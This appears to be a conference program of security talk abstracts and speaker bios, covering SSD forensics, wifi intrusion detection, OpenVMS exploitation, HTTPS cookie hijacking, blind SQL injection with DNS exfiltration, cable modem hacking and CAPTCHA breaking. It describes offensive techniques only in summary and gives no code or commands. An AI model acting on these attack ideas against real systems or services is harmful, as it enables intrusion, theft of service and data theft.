If you are in a computer forensic job or collect any kind of digital evidence for any legal purpose you might want to be aware of what is about to happen to your jobs! Now is the time to get knowledgeable about this topic and do what you can to prevent it from becoming the requirement for you to have a job. Computers Forensics/Security and Private Investigations are so different that many people will never believe that is what will enable you to be able to do your job. This will destroy certifications as we know it for many digital fields.

Scott Moulton Scott Moulton began his forensic computer career with a specialty in rebuilding hard drives for investigation purposes and has rebuilt hard drives for several cases including murder investigations, corporate fraud, civil defense and criminal defense.

Scott was the first person arrested for Port Scanning and won his case back in 2000 when the judge declared Port scans legal. Scott has also been fighting against computer forensic people and computer security people having to become private investigators for which laws are being passed in each state making it a felony to do any kind of 'digital investigation' without a PI License.

Scott has spent more than a year digging into repairing Solid State Hard Drives and understands the ins and outs and how it will affect recovery and forensics in the future. Many forensic jobs will change due to fact that some information will not be accessible in the future.

Top of page

Solid State Drives Destroy Forensic & Data Recovery Jobs: Animated!


Scott Moulton
President of Forensic Strategy Services, LLC

This speech is all ANIMATION in 3D! Data on a Solid State Device is virtualized and the Physical Sector that you are asking for is not actually the sector it was 5 minutes ago. The data moves around using wear leveling schemes controlled by the drive using propriety methods. When you ask for Sector 125, its physical address block is converted to an LBA block and every 5 write cycles the data is moved to a new and empty previously erased block. This destroys metadata used in forensics & data recovery. File Slack Space disappears, you can no longer be sure that the exact physical sector you are recovering was in the same location or has not been moved or find out what it used to be!

I will explain how Flash and Solid State Drives are different and compare them to hard drives in their ability to read and write data. What happens when they are damaged and a recovery needs to be done? In this process you will see how the data gets shuffled around and how some of the data is destroyed in the process making it impossible in many cases to recover some files and metadata that on a hard drive has been a simple task by comparison. You will also get an idea about how propriety methods that each vendor is using will isolate you from knowing what is happening to your data or even where it is on the drive. And at the very least the animation is the quality of the History Channel and you will enjoy what you are learning!

Scott Moulton Scott Moulton began his forensic computer career with a specialty in rebuilding hard drives for investigation purposes and has rebuilt hard drives for several cases including murder investigations, corporate fraud, civil defense and criminal defense.

Scott was the first person arrested for Port Scanning and won his case back in 2000 when the judge declared Port scans legal. Scott has also been fighting against computer forensic people and computer security people having to become private investigators for which laws are being passed in each state making it a felony to do any kind of 'digital investigation' without a PI License.

Scott has spent more than a year digging into repairing Solid State Hard Drives and understands the ins and outs and how it will affect recovery and forensics in the future. Many forensic jobs will change due to fact that some information will not be accessible in the future.

Top of page

Beholder: New wifi monitor tool


Nelson Murilo
Security Researcher
Luiz 'effffn' Eduardo
Security Researcher

Although it's not something new at all, network administrators are still facing (and having to deal) with old problems and threats. One of these problems is to be able to detect rogue and/or fake access points in their networks and surroundings. The current solutions available are mostly commercial and/or proprietary, but we haven't seen yet any open-source tool that implements specifically WIDS capabilities. We would like to introduce to DefCon: Beholder. The talk will include a brief introduction on the general state of the commercial WIDS tools and evolution of wireless attacks, and will be mostly focused on the Beholder project. Beholder is an C language opensource tool available (for now) for linux platforms, and it can be used for any available 802.11 technology a nic card may support, and it isn't driver dependent, run in all available linux wifi drivers. The tool does some, of course, some basic network scanning, but also implements some simple (but cool) stuff, that some of the commercial tools don't have. The presentation will cover details about that tool, future features, scenarios to be implemented, examples, and a demo (yep, demo at DefCon) of malicious AP/tools in action and how beholder can be used to detect it.

Nelson Murilo has been a Network Security Analyst since 1992. He is the author of two network security books in Portuguese, regular contributor of the Brazilian Computer Emergency Response Team security guides and technical papers and a regular speaker at security conferences in Brazil and abroad. Nelson is the author and co-author of open source security tools such as:

* chkrootkit - locally checks for the presence of a rootkit
* Btsearch - tool developed to find bluetooth hidden devices

Luiz 'effffn' Eduardo has over 15 years of experience working with network security, and, for the past 6 years has been mostly dedicated to wireless security, protocol fuzzing and computer incident response. He is somewhat known in the scene for planning, implementing and supporting wireless networks in security conferences, like DefCon, BlackHat, Computer Chaos Congress, Shmoocon, Layerone, etc. He's one of DefCon networking team goons and has spoken previously at Shmoocon, DefCon, Toorcon, Hack in the Box Malaysia and other cons. Luiz currently holds the following certifications: CISSP, CWNE, CEH, GCIH and GISP, and has probably being able to get them due to long flights around the globe and flight delays in airports (thanks, United!)

Both Nelson and Luiz are some of the organizers of the conference: you sh0t the sheriff, which takes place in in Sao Paulo, Brazil.

Top of page

Good Viruses. Evaluating the Risks


Dr. Igor Muttik
Sr. Architect McAfee Avert Labs

This session will discuss the risks associated with creation of replicating code. A combination of wide availability of virus source code as well as the problem of control over replicating code make these experiments quite risky. To demonstrate these points we shall see how a computer virus was once created unintentionally in a self-modifying tool called ALREADY.COM (we'll disassemble and debug it). We shall watch a video of the "Corrupted blood" epidemic in World of Warcraft when a virtual "good" virus got out of control. We will examine "beneficial" properties of W32/Nachi worm and discuss pros and cons of harnessing replication for patching vulnerabilities.

Dr. Igor Muttik graduated from Moscow State University in 1985. His Ph.D. in 1989 was based on the research of semi- and super-conductors. He became interested in computer viruses in 1987 when PCs in the lab were infected with Cascade.

In 1995 he joined Dr.Solomon's Software in the UK as a Virus Researcher. In 1999 he headed Avert in Europe and now is Senior Avert Labs Architect. He speaks regularly at security conferences.

Top of page

Brain Games:


Make your own Biofeedback Video Game


Ne0nRa1n

Joe "Kingpin" Grand
Founder, Grand Idea Studios

More and more scientific studies are weighing in on video games and their positive benefits. The dated idea of video games being damaging to one's health and a waste of time is slowly being replaced with the idea of video games as high-tech therapy. By incorporating sensors to measure the player's physiological state, game play performance can be affected or altered. Among the various types of biofeedback, heart rate variability is one of the easiest to understand and build hardware for. In this presentation, not only will we guide you through how to construct simple hardware to read your own heart rate and provide you with some open-source code as a starting point for your future favorite biofeedback game designs, we will also use a real-live human volunteer from the audience to demonstrate the technology!

Ne0nRa1n a veteran DEFCON speaker on the human brain and all its wonders, stumbled onto the 'computer underground' almost a decade ago and yet she still somehow has never managed to graduated from any secondary institution, still has never held a job of any great importance and still has yet to write a book. After eventually realizing that she would never become what society wanted her to be, she now happily works quietly at home on her projects; some which she shares at DEFCON.

Joe "Kingpin" Grand is an electrical engineer, hardware hacker, and former member of L0pht Heavy Industries. Even with his distrust of The Man, he has become a co-host of an upcoming engineering build show, Prototype This, for Discovery Channel, and has even done some stuff with biofeedback devices on the program. Sometimes he uses his real name, Joe Grand, and invents things for his company, Grand Idea Studio (www.grandideastudio.com). He's also the sole proprietor of Kingpin Empire, a hacker-inspired merchandise outfit (www.kingpinempire.com) that gives back to the community through charitable donations. He's designed the badge for DEFCON a few times, too.

Top of page

Anti-RE Techniques in DRM Code


Jan Newger
Security Researcher

In order to prevent music from being copied among consumers, content providers often use DRM systems to protect their music files. This talk describes the approach taken while analysing a DRM system (whose identity needs to be kept secret due to legal issues). It is shown what techniques were used to protect the system from being easily reverse engineered. This is not about how to hack $Insert_DRM_Here. No decryption tools or information on how to write one will be released.

Jan Newger has been enjoying Reverse Engineering for years and he is going to receive his diploma in CS towards the end of the year. He has been working on several software projects in the field of mechanical engineering.

Top of page

VoIPER: Smashing the VoIP stack while you sleep


N.N.P.
Hacker, UnprotectedHex.com

With VoIP devices finding their way into the majority of major enterprises and a significant number of residential installations, the possible consequences of a security vulnerability that can be leveraged by malicious hackers are ever increasing. While the security of data and voice traffic has been extensively promoted and tested the security of the devices themselves has been poorly tested at best. A remote vulnerability in a VoIP device could subvert all other VoIP security and as a result extensive testing of both VoIP device software and hardware is needed if we are to prevent future intrusions.

During this talk I will outline why the security of the software powering VoIP networks is of critical importance and why businesses, developers and security auditors need to pay more attention to the software they are deploying, developing and testing in real world installations. I will show the need for an automated, black box, protocol compliant and open source testing suite. I will then present VoIPER, a cross platform, easy to use toolkit that can automatically and extensively test VoIP devices as well as providing extensive target management, logging and crash detection critical to modern security testing. VoIPER includes a fuzzing suite which is fully protocol aware and can generate hundreds of thousands of tests for the major VoIP protocols. Unlike many attempts at fuzzing VoIP, VoIPER can interact with the devices under test in a fully protocol compliant fashion and potentially test their entire state spaces. Its classes are easy to use and extendable to allow users to piece together protocol compliant tests and integrate them with the main test suite.

VoIPER has been used to discover security vulnerabilities in every device tested during its initial testing phase including soft-phones, hard-phones, gateways and servers.

N.N.P. is a hacker from Ireland who's primary interests are in automating the vulnerability discovery and exploit development processes. He has been involved in the hacking and security communities for 6 years and discovered vulnerabilities in a variety of different applications. At the moment his main focus is on exploiting VoIP devices and the application of formal verification methods and dynamic binary instrumentation to fuzzing. He runs UnprotectedHex.com and is an administrator on the SmashTheStack wargaming network.

Top of page

The World of Pager Sniffing/Interception: More Activity than one may suspect


NYCMIKE
Hobbyist Signals Collector

Paging networks once sat at the top of the personal and professional communication pyramid. Cell phone technology's have since replaced the now legacy networks at the consumer level, with the exception of niche markets (Due to the signal quality in doors: IT, Emergency Services, Government) the technology may have been retired to a permanent stay in a junk pile. With the fleeing attention and use, it appears that sniffing/interception of pager traffic within the United States has declined to almost a standstill. The scope of this paper is to re-introduce the activity of FLEX (1600/3200 level 2, 3200/6400 level 4) and POCSAG (512, 1200, 2400) then present how a hobbyist can decode it, provide a first hand account of how to install and operate a pager "listening Post", introduce a few ways to use captured cap codes, and offer a conceptual "new" technique in capture pager traffic. With that said, my expertise is limited and I by no means should be considered an expert nor should this writing be interpreted as testament. Last but not least there are laws governing over RF interception and they must be adhered (this means you).Decoding digital data with a soundcard now a days is easier than getting on the internet.



Top of page

Hacking OpenVMS


Christer Öberg
Security Researcher
Claes Nyberg
Security Researcher
James Tusini
Security Researcher

OpenVMS is considered a highly secure and reliable operating system relied upon by large enterprises around the globe such as Stock Exchanges, Governments and Infrastructure for critical operations. Our talk will focus on subverting the security of the OpenVMS operating system in a number of new and creative ways. There will be an initial brief introduction to the OS basics, security model and its core features. We will also talk about things we perceive as flaws in the security model and weaknesses in the security features provided by OpenVMS. There will also be a practical demonstration of the 0day vulnerabilities found, ranging from logical to memory corruption bugs, along with discussion on how these were found and exploited and obstacles encountered in the process.

Christer is based in the UK. He enjoys discovering and exploiting new software vulnerabilities in pretty much everything except web applications. His favorite targets are OS kernels and "unusual" things like OpenVMS. Christer has previously presented at Black Hat Europe, USA and Defcon.

Claes Nyberg is interested in vulnerability research and development of tools and exploits in both userland and kernel space. Claes has released popular tools such as MITM-SSL and MITM-SSH as well as one of the first public non listening shell servers, SAdoor. Claes has previously spoken at Black Hat US and Defcon.

James Tusini is a security consultant based in the UK, currently employed as a principal consultant for a London-based firm. Since 2000, James has been undertaking penetration tests and running bespoke projects for large firms within the financial, retail and government sector. He comes from a programming background James enjoys discovering new vulnerabilities and keeping abreast with any new development in the security industry. His interests are not limited to technical stuff though, as he is very keen in the non-technical aspects of process manipulation too, such as social engineering, psychology and hypnosis.

Top of page

Every Breath You Take


Jim O'Leary
Security Researcher

How much data do you generate in the process of living an ordinary day? This talk covers various ways to gather, persist and analyze the data stream that is your life. We'll cover a few of the approaches that are available today, some easy code you can whip up to persist anything you please, and what to expect from the community and businesses moving forward. Privacy/security impact is sure to be huge, so hold on to your hats, and start tracking and logging everything! Somebody else may be doing it for you already..

Jim O'Leary is a security dude, doing security things. Typically not a fan of speaking in the third person, or self-important bios, he has the following creds: compsci & psych degrees, cissp, contributions to a few books, security-related patents in various states of filing, and a pretty sweet job in Redmond. Identity thieves and overzealous bio researchers can check out bio.jimio.com.

Top of page

365-Day: Active Https Cookie Hijacking


Mike Perry
Reverse Engineer, Riverbed Technology

Last year during my Tor presentations at Black Hat and Defcon, and in a follow up post on BugTraq, I announced that many SSL secured websites are vulnerable to cookie hijacking by way of content element injection. Unfortunately, my announcement was overshadowed by Robert Graham's passive cookie stealing attacks (aka 'SideJacking').

The difference between our attacks is this: instead of sniffing passively for cookies, it is possible to actively cull them from targets on your local network by injecting images/iframes for desired sites into unrelated webpages. Moreover, since many sites do not set the 'secure' bit for their SSL cookies, it is even possible to grab cookies used in https sessions and use them to impersonate users. This will be demonstrated.

At the time of this writing, vulnerable SSL sites include Gmail, Facebook, Amazon, and many others. Since wide-spread awareness of the threat seems to be the only way to convince these vendors that they need to secure their cookies, fully automated exploit code will be provided two weeks after the demonstration (however, it is also possible to steal insecure https cookies with just airpwn and wireshark).

Mike Perry is a forward and reverse engineer employed by Riverbed Technology. He also moonlights as a volunteer for the Tor Project, and considers security a hobby. He is somewhat annoyed that the https cookie issues he discussed are still not fixed on most major websites, a full year later.

Top of page

Urban Exploration - A Hacker's View


Phreakmonkey

mutantMandias

Urban Exploration is the practice of discovering and exploring (and often photographing) the more "off-beat" areas of human civilization. Popular targets of Urban Exploration include abandoned hospitals or institutions, empty factories, and other disused structures, but it can also include "active" sites such as service corridors, utility levels, rooftops, storm drains, steam tunnels, you name it.

For years, the Urban Exploration community and Hacker community have existed in parallel despite their many commonalities. This talk will introduce UrbEx to the DefCon community and explore the similarity of the mindsets between those who explore the far reaches of cyberspace and those who explore the forgotten areas of the real world.

Bring an open mind, a sense of adventure, and any experiences you've had when you've wandered into a forgotten or "off limits" area just to see what's there. You might already be an Urban Explorer and not have realized it!

K.C. (Phreakmonkey) is a computer security engineer by trade and has attended DefCon for ten consecutive years. When he is not staring at computer screens he likes to apply his abstract thinking abilities to exploring the world around him and photographing what he discovers. K.C. has been exploring since he was a young child, when his mother had a penchant for self-guided tours of half-built houses. Ever since, he has been drawn to seeing what lies beyond unmarked doors or off-limits hallways. In recent years K.C. has combined photography with his love of the relics of our disposable infrastructure. Through sharing these photographs and experiences, he found that many people around him share his fascination with the forgotten and behind-the-scenes view of the world.

Mandias (mutantMandias) is an IT guy, Photographer, and Agitator who tries not to be blind to the world around him, and is constantly amazed by what people fail to see. He thinks that the back of a No Trespassing sign is beautiful, and always feels better when he is on the "other" side of barriers designed to keep people out. His exploration fetish was partially fed as a youngster by seeing a pro Neutron Bomb propaganda film which depicted a glorious victory over an enemy by simply melting away all of the people, leaving the buildings and industry intact. He thought it was a really cool idea, and likes to take pictures that embody that kind of feeling, but thinks that actually melting away all of the people in the world might take too much effort.

Mandias has explored and photographed with lots of people, in locations from Japan to Denmark to Canada. He is a founding member of S(UE), and habitually makes an ass of himself.

K.C. is a member of the Atlanta Urban Exploration League "AUEL" and the Southern Urban Explorers "S(UE)".

Top of page

Malware Detection through Network Flow Analysis


Bruce Potter
Founder, The Shmoo Group

Over the last several years, we've seen a decrease in effectiveness of "classical" security tools. The nature of the present day attacks is very different from what the security community has been used to in the past. Rather than wide-spread worms and viruses that cause general havoc, attackers are directly targeting their victims in order to achieve monetary or military gain. These attacks are blowing right past firewalls and anti-virus and placing malware deep in the enterprise. Ideally, we could fix this problem at its roots; fixing the software that is making us vulnerable. Unfortunately that's going to take a while, and in the interim security engineers and operators need new, advanced tools that allow deeper visibility into systems and networks while being easy and efficient to use.

This talk will focus on using network flows to detect advanced malware. Network flows, made popular by Cisco's NetFlow implementation available on almost all their routers, has been used for years for network engineering purposes. And while there has been some capability for security analysis against these flows, there has been little interest until recently. This talk will describe NetFlow and how to implement it in your network. It will also examine advanced statistical analysis techniques that make finding malware and attackers easier. I will release a new version of Psyche, an open source flow analysis tool, and show specific examples of how to detect malware on live networks. I will also release a tool designed to craft and spoof netflow records for injection into netflow collectors.

Bruce Potter is the founder of the Shmoo Group of security, crypto, and privacy professionals. He is also the co-founder and CTO of Ponte Technologies, a company focused on developing and deploying advanced IT defensive technologies. His areas of expertise include wireless security, network analysis, trusted computing, pirate songs, and restoring hopeless vehicles. Mr. Potter has co-authored several books including "802.11 Security" and "Mastering FreeBSD and OpenBSD Security" published by O'Reilly and "Mac OS X Security" by New Riders.

Top of page

The true story of the Radioactive Boyscout:


The first nuclear hacker and how his work relates to Homeland Security's model of the dirty bomb


Paul F. Renda
Data Security Analyst

David Hahn was working on his atomic energy Eagle Scout badge when he had the idea why not build a reactor. However, not just any reactor, he would build a breeder reactor. This type of reactor produces more fuel and power as long as it is working. David used social engineering, unlimited drive and resourcefulness to produce his reactor type device. He succeeded further that any expert in the nuclear world would have dreamed.

Ultimately, the EPA had to clean up his work shed as nuclear and chemical waste site.

I am going to perform a couple of Simple Safe demos related to David's work.

The second part of the talk will deal with Homeland Security s model of the dirty bomb. I will show how David's reactor relates to the current model.

At the end of the talk, I will issue the first annual Dr. Strangelove award for the best question submitted to Me. I have a lot of material to cover so try to study up on reactors.

Paul F. Renda started his career working on IBM 360 and the PDP 11. He was an early advocate of using Hacking Software to check corporate data systems and has presented talks at the COMPUTER SECURITY INSTITUTE. Paul s articles have appeared in the Info Security magazine.

In 1995 Paul, developed a defense against WAR DIALERS. His process was published in Info Security Magazine. A dialer is a program that dials a series of phone number and logs number that are connected to a modem. He is currently a computer security analyst.

Top of page

How can I pwn thee? Let me count the ways


Renderman
Church of WiFi

The wonders of technology have given rise to a new breed of workforce, the mobile workforce. Able to leap large oceans in a single cattle class bound, they are the newest agent of business and the newest pain in your butt. The average business traveler carries with him a multitude of ways to get pwn'd while away from the office and away from your watchful BOFH eye. Come count the ways we can pwn that beleaguered business traveler without even touching him.

Renderman is a Canadian born and raised hacker, co-refounder of the Church of Wifi and a 10 year attendee of Defcon and numerous other hacker cons. He has been a highly visible and active member of the wardriving community, helping to improve attacks where he can, such as the WPA-PSK rainbow tables. Co-author of "RFID Security" and "Kismet Hacking" by Syngress publishing, he can usually be found taking something wireless apart and stuffing it inside a children's plaything, picking locks, at the bar, or looking for more employment to keep up his globe trotting, hacker con lifestyle.

Top of page

10 things that are pissing me off


Renderman
Church of WiFi

This year will be my 10th year of Defcon and my liver has the scars to prove it. In that time I've learned that this community can do anything. In that time I've also become a jaded and bitter IT consultant and there are alot of things pissing me off in the tech world. Some of these things have pissed me off that I'm finally doing something about it, others I need your help. Come get an idea what's in my head pissing me off and probobly pissing you off as well and what you and I can do about it.

Renderman is a Canadian born and raised hacker, co-refounder of the Church of Wifi and a 10 year attendee of Defcon and numerous other hacker cons. He has been a highly visible and active member of the wardriving community, helping to improve attacks where he can, such as the WPA-PSK rainbow tables. Co-author of "RFID Security" and "Kismet Hacking" by Syngress publishing, he can usually be found taking something wireless apart and stuffing it inside a children's plaything, picking locks, at the bar, or looking for more employment to keep up his globe trotting, hacker con lifestyle.

Top of page

The Big Picture: Digital Cinema Technology and Security


Mike Renlund
Security Researcher

Digital Cinema. Its the first major upgrade to a movie's image in more than 50 years, and it has brought new standards of quality, security, and technology into your local theater complex. This talk will cover what the new BIG PICTURE is all about, the changes made from film, both in the image and sound, and the new security methods involved that help prevent piracy. 3D and alternative content will also be discussed. Come see where the technology stands, and where it is going, and how to get the most out of your movie going experience.

Mike Renlund has been a fan of movies ever since he can remember. In 2001 he made the jump from online digital content to movies exhibition. For the past several years Mike has been working with major equipment manufacturers and studios to advance the field and bring a better experience to the masses. Mike has consulted for national and local chains in repair and design of digital cinema systems and installing new equipment.

Top of page

New Tool for SQL Injection with DNS Exfiltration


Robert Ricks
Senior Information Systems Engineer, G2, Inc.

For years people have been warned that blind SQL injection is a problem, yet there are a multitude of vulnerable websites out there to this day. Perhaps people don't realize that these vulnerabilities are very real. The current state of the art tools are Absinthe and SQL Brute for exploiting blind SQL injection. DNS exfiltration has been proposed as a method of reaching previously unassailable blind SQL injection access points. We have created a proof-of-concept tool which can download an Oracle schema and data from its tables in an automated fashion using DNS as its exfiltration mechanism. Unlike Absinthe this tool does not require any difference between successful and unsuccessful queries to work. It is also much faster than current tools since it can retrieve more than one byte of information at a time and doesn't require noticeable differences in timing. Perhaps this will help people realize that their private data is exceedingly vulnerable if they have even one SQL injection access point and don't take appropriate precautions.

Robert Ricks: Bob works for G2, Inc. as a senior information systems engineer. He has experience in data mining, artificial intelligence and development of security and exploitation tools.

Top of page

Advanced Physical Attacks: Going Beyond Social Engineering and Dumpster Diving


Or, Techniques of Industrial Espionage

Eric Schmiedl
Security Researcher

Your stack is smash-proof. Your dumpster is fully alarmed. And your firewall is so secure that it has former Soviet officials green with envy. So why are the developers finding their undocumented features in competitors' products, or company executives on a constant hunt for leaks and traitors? There's a whole lot more to doing an end-run around network security than calling up and pretending to be the help desk or hoping someone chucks a service manual in the trash Professional attackers with specific targets have a whole rash of techniques -- from using targeted employees to hiding microphones -- adopted from the world of espionage, and this talk is all about how they do what they do.

Eric Schmiedl has spoken on access control systems at BlackHat 2007 and safecracking at DEFCON 14. He is a member of the TOOOL.US Board of Directors, maintains a semblance of an undergraduate career at the Massachusetts Institute of Technology, and has been picking locks all his life.

Top of page

Gaming - The Next Overlooked Security Hole


Ferdinand Schober
Security Researcher

"Thanks to Web 2.0 and other over hyped BS, development has been moving farther and farther away from bare metal. Assuming you trust your libraries, this could even be called a good thing. If you're high."

PC gaming, despite Microsoft's best efforts, is not dead. Yet. The modding community is alive and active, and even those same over hyped web technologies are starting to encroach in to shaders, and other things they shouldn't touch. Let's no even get started on the shady communities providing bots, cheats, and other grey market goods.

We're now seeing those unifying technologies the web, and monolithic engines making their way in to these games. Automatic updates, electronic publishing systems, in-game advertisements, pay-for-item MMORPG systems all of these represent structural weaknesses that more and more people should be exploiting. Given the expectation of today's gamers a far as graphics, physics, and other frivolous crap, smaller developers have to purchase someone else's engine to get started and all of the bugs that come with it.

This presentation will begin with a quick overview of what we've seen so far, and will progress in to specific weak points in current and future releases.

High points will include:

* Why buying someone else's engine is a bad idea (with charts!)
* The proliferation of middleware, and the homogenization of gaming
* The little "nude patch" that could: how to own yourself
* Fake world + real money + ??? = Profit, or the economics of game exploits

Ferdinand Schober has been ranting about games for several years, and has been playing them in lieu of sleep since grade school. He recently left a security testing position with the highest ranked game publisher.

Top of page

Making a Text Adventure Documentary


Jason Scott
Textfiles.com

For the past 3 years, Jason Scott (creator of BBS: The Documentary) has been working on another project, telling the history and the legends of text adventure games. 80 interviews later, he comes to DEFCON to show footage, describe the process of making the film, why history of games is important, and what it was like to visit the actual cave the first adventure game was based on.

Jason Scott is celebrating 10 years of running his computer history archive TEXTFILES.COM. He is a documentary filmmaker, computer historian, retro-nostalgia cynic, and blabbermouth. He lives in Massachusetts with a very, very large pile of stuff. His weblog tends to be at http://ascii.textfiles.com.

Top of page

Free Anonymous Internet Using Modified Cable Modems


Blake Self
Security Researcher, SERC
DevDelay

Bitemytaco
Co-owner, Surfboard Hacker

Using various modifications and techniques - it is possible to gain free and anonymous cable modem internet access. This talk will analyze and discuss the tools, techniques, and technology behind both hacking cable modems and attempting to catch the users who are hacking cable modems. Previously confidential information gained from a senior network technician at Time Warner will be disclosed in this speech. We will also talk about how these techniques have been used to keep various heavily used servers online and anonymous for over six months without detection.

Blake Self is most widely known for co-authoring the first commercial encrypted instant messenger with Dr. Cyrus Peikari while at VirusMD. He has also worked as a SIPRNET Administrator, Department of Defense Red Team Analyst, and R&D at various corporations including Airscanner and Ontario Systems. He currently works as an analyst for the Healthcare and Debt Collection industries as well as doing research for SERC (http://www.serc.net).

Bitemytaco is the co-owner of Surfboard Hacker (www.sbhacker.net), the best modem hacking website and forum. He is an expert on DOCSIS and Motorola cable modem modification, especially the SB5100 and SB5101. He also made possible and funded the development of the first hacked firmware for the SB5101, SBH Haxorware (by Rajkosto).

Top of page

StegoFS


James Shewmaker
Bluenotch

This talk will reintroduce classic steganographic techniques to use with serializing, watermarking, or stashing your data in the latest Internet meme. Why not let everyone who is forwarding yet another painful nut-shot AFHV clip store your data for you? We will create a simple filesystem that is robust enough to survive conversion, and building a structure to organize the data, focusing on indirection and fault tolerance.

Jim has over 15 years experience in IT, primarily developing appliances for automation and security for broadcast radio, Internet, and satellite devices. He is one of the first GIAC Platinum certified Malware (GSM) experts and a SANS Institute Instructor. Jim's primary focus areas are investigations, penetration testing, and analysis. He is actively contributing to SANS courseware and occasional FreeBSD port contributor.

Top of page

Let's Sink the Phishermen's Boat!


Teo Sze Siong
Security Researcher, F-Secure Corporation
Hirosh Joseph
Security Researcher, F-Secure Corporation

In this presentation, an advanced form of phishing attack will be discussed to show the risk how criminals might steal the entire fund from an online banking account protected with daily transaction limit and bypassing the 2-factor authentication system. This type of attack is able to work in stealthy mode without showing theft symptoms in the bank account balance to keep the victims in the dark. Challenges and limitations encountered by the existing phishing detection techniques will be also identified and reviewed to understand the applicability of each technique in different scenarios.

As a step taken to combat phishing attacks effectively, the concept of 'website appearance signature' will be presented and explained how this new concept can be applied to detect unknown phishing websites. This has been a great challenge in the past since most phishing website detection tools verify the reputation of a website using a database of blacklisted URLs. In addition, a Proof-Of-Concept application employing the 'website appearance signature' combining with conventional phishing detection techniques will be demonstrated to see its accuracy and effectiveness as a phishing website detection tool.

Teo Sze Siong started programming at the age of 12. He is currently a Security Researcher at F-Secure Corporation, mainly working on threat analysis automation systems and honeyclient related research. His previous jobs as a Software Engineer with IRIS Corporation and Technical Consultant for InfiniteQL Group's R&D have exposed him to security area of various industries such as the government sector, casino, telecommunication, banking and property management companies. He has designed and implemented the Kingdom of Bahrain National Passport smartcard application, ePerolehan smartcard application for Malaysia government, real-time SCADA software for Maxis Communications and large scale video streaming and backup solutions for the Genting Casino Group. He has also developed a generic smartcard applet testing framework and APDU interpreter engine for IRIS Corporation. Last year, he has represented Malaysia at the United Nations ICT forum at Geneva, Switzerland. Some of his achievements include:

Certified Penetration Testing Specialist
Certified Scrum Master
2nd runner up of Microsoft Imagine Cup 2004 (Software design)
Youngest speaker at the Hack In The Box Security Conference 2004
Winner team in the AstroTechnoloGenius Contest, Malaysia

Hirosh Joseph is currently working as a Web Security Researcher at F-Secure Corporation. He is the co-author of book entitled, Vulnerability Analysis and Defense for the Internet, published by Springer (ISBN-10: 0387743898) Previously, he was working at Third Brigade, a Canada based Information Security Company. He was one of the early members of Third Brigade Security Center and the key members of the research team. He has more than five years of experience in vulnerability research and is passionate about reverse engineering, malware analysis and spyware technologies. He has also held security research position at Blue Lane Technologies.

Top of page

Medical Identity Theft


Eric Smith
Assistant Director of Information Security and Networking, Bucknell University
Dr. Shana Dardan
Assistant Professor of Information Systems, Susquehanna University

In less than an hour, during a scheduled pentest, our team was able to retrieve 3.2 million patient insurance records from a HIPAA-compliant medical facility. Using these records, we could have generated counterfeit insurance and prescription cards which would pass muster at any doctor's office or pharmacy counter. If you are one of the 47 million Americans with no health insurance or happen to have a medical condition you wished to hide from employers or insurers, would you consider purchasing falsified medical documents? Thousands of Americans have already said yes, without thinking twice about the victim of their victimless crime.

What happens to you if your medical identity is stolen? You may find yourself liable for thousands of dollars of co-pays, deductibles, and denied claims. Is this because you forgot to shred an important document? Did you fall for a phishing scheme online? Of course not -- it was entirely outside of your control, and it happened because the current HIPAA regulations are insufficient to protect your medical identity.

In this talk, we'll review the current state of HIPAA and other laws covering the security of your medical records, and discuss what changes need to be made, both in policy in practice, to shore up the security of our medical records.

Eric Smith is Assistant Director of Information Security and Networking at Bucknell University, located in Lewisburg, Pennsylvania. He has over 15 years of field experience in information security, networking, and systems administration. He has provided consultation services in places such as Research Triangle Park and New York City. Eric is a founding member of PreSet Kill Limit, the security research group which has won the Defcon Wardriving Contest the past several years.

Shana Dardan holds a PhD from the University of North Carolina at Charlotte in Information Technology. Currently, she is conducting research in the area of IT Investment Valuations and Digital Healthcare for hospitals nationwide. Shana has been an invited member of the WiSac and Pennsylvania Broadband task forces. Previous corporate research includes notable companies such as Intel Corp, where she conducted research for Doug Busch, VP and CIO on IT investment analysis. She speaks at industry events on investment strategies, IT security, and outsourcing and has contributed to numerous books. Shana joined Susquehanna University in 2006, where she teaches Systems Analysis and Design as well as IT Strategy.

Top of page

CAPTCHAs: Are they really hopeless? (Yes)


Mike Spindel
Security Researcher
Scott Torborg
Web Application Developer

CAPTCHAs are widely used to protect websites against malicious robots. Yet, CAPTCHAs are being broken routinely by spammers, malware authors, and other nefarious characters. This talk will review and demonstrate many of the implementation weaknesses that are routinely exploited to break image-based CAPTCHAs, and offer suggestions for improving the effectiveness of CAPTCHAs. Rather than attempt an in-depth examination of any single CAPTCHA or technique, we will present a broad overview of tools with the aim of making it easy for anyone to take a shot at cracking the CAPTCHAs on present and future high-profile sites.

Mike is a recovering graduate student with a penchant for security research and good bourbon. His interests include distributed systems, MANETs, reverse engineering, and physical access control.

Scott Torborg is a web application developer in Silicon Valley. Although equally at home with an oscilloscope probing an electromechanical lock or tinkering with javascript obfuscation, he is most likely to be found indulging vices.

Top of page

Living in the RIA World


Alex Stamos
Founding Partner, iSEC Partners Inc.
David Thiel
Senior Security Consultant, iSEC Partners
Justine Osborne
Security Consultant, iSEC Partners

Rich Internet Applications (RIA) represent the next generation of the Web. Designed to run without constant Internet connectivity, they provide a graphical experience equivalent to thick desktop applications with the easy install experience of thin Web apps. They intentionally blur the line between websites and traditional desktop applications and greatly complicate the jobs of web developers, corporate security teams, and external security professionals.

Our goal with this talk will be to outline the different attack scenarios that exist in the RIA world and to provide a comparison between the security models of the leading RIA platforms. We will discuss how current attacks against web applications are changed with RIA as well as outline new types of vulnerabilities that are unique to this paradigm. Attendees will learn how to analyze the threat posed to them by RIA applications as either providers or consumers of software built on these new platforms.

We will also be discussing the attack surface exposed by the large media codec stacks contained in each of these platforms. Our targeted platforms include Adobe AIR, Microsoft Silverlight, Google Gears, JavaFX, and Mozilla Prism. At this talk, we will be releasing tools for testing the codec security of these platforms as well as sample malicious code demonstrating the danger of RIA applications.

Alex Stamos is a Founding Partner of iSEC Partners and is an experienced security engineer and consultant specializing in application security and incident response. He is a leading researcher in the field of web application and web services security and has been a featured speaker at top industry conferences such as BlackHat, DefCon, SyScan, Infragard, Microsoft BlueHat, Toorcon, the Web 2.0 Expo and OWASP AppSec. He holds a BSEE from the University of California, Berkeley, and spends his spare time chasing his baby son and sailing on the SF bay.

David Thiel is a Senior Security Consultant with iSEC Partners. David has over 12 years of computer security experience, auditing and designing security infrastructure in the electronic commerce, government, aerospace and online wagering industries. His areas of expertise are web application penetration testing, network protocols, and fuzzing. Research interests include media software vulnerabilities, mobile and embedded device exploitation, and attack vectors in emerging web application technologies and network protocols. David has presented research and security topics at Black Hat USA as well as to the HTCIA.

